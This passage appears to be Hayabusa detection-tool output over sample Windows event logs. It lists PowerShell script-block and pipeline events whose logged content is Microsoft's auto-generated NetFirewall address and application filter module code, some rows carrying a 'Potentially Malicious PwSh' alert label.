'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 